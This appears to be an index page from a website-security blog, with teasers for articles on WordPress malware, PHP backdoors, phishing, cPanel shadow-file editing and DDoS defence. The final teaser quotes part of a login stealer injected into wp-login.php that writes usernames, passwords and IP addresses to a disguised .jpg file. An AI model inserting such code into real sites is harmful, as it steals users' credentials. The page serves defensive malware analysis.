Malicious Plugin Used to Encrypt WordPress Posts
Krasimir Konov During a recent cleanup, we found an interesting malicious WordPress plugin, “WP Security”, that was being used to encrypt blog post content. The website owner…
EE wireless provider phishing malware
A large number of phishing targets include popular services such as banks, payment providers, and email services. In this type of attack, fraudsters create fake…
Neapolitan Backdoor Injection
Ben Martin Most of us are familiar with Neapolitan ice cream: a flavour whose distinguishing characteristic is not one single flavour but several. Many also know it…
New variant of “trollherten” malware
Luke Leal We continue to see new variations of obfuscation used to hide a PHP backdoor that began to be heavily used by malicious users in late…
Self-destruct malware
The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access. During…
Yet another variant of the cPanel user shadow editor malware
We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for…
Reverse Hardening WordPress Config
Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions…
Plugins Under Attack: July 2019
John Castro A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack…
How to Stop a DDoS Attack
Victor Santoyo DDoS attacks are a growing threat for websites. But do you know how to stop them in their tracks? We’ll cover some essential fundamentals on…
Simple but effective backdoor
We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning…
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…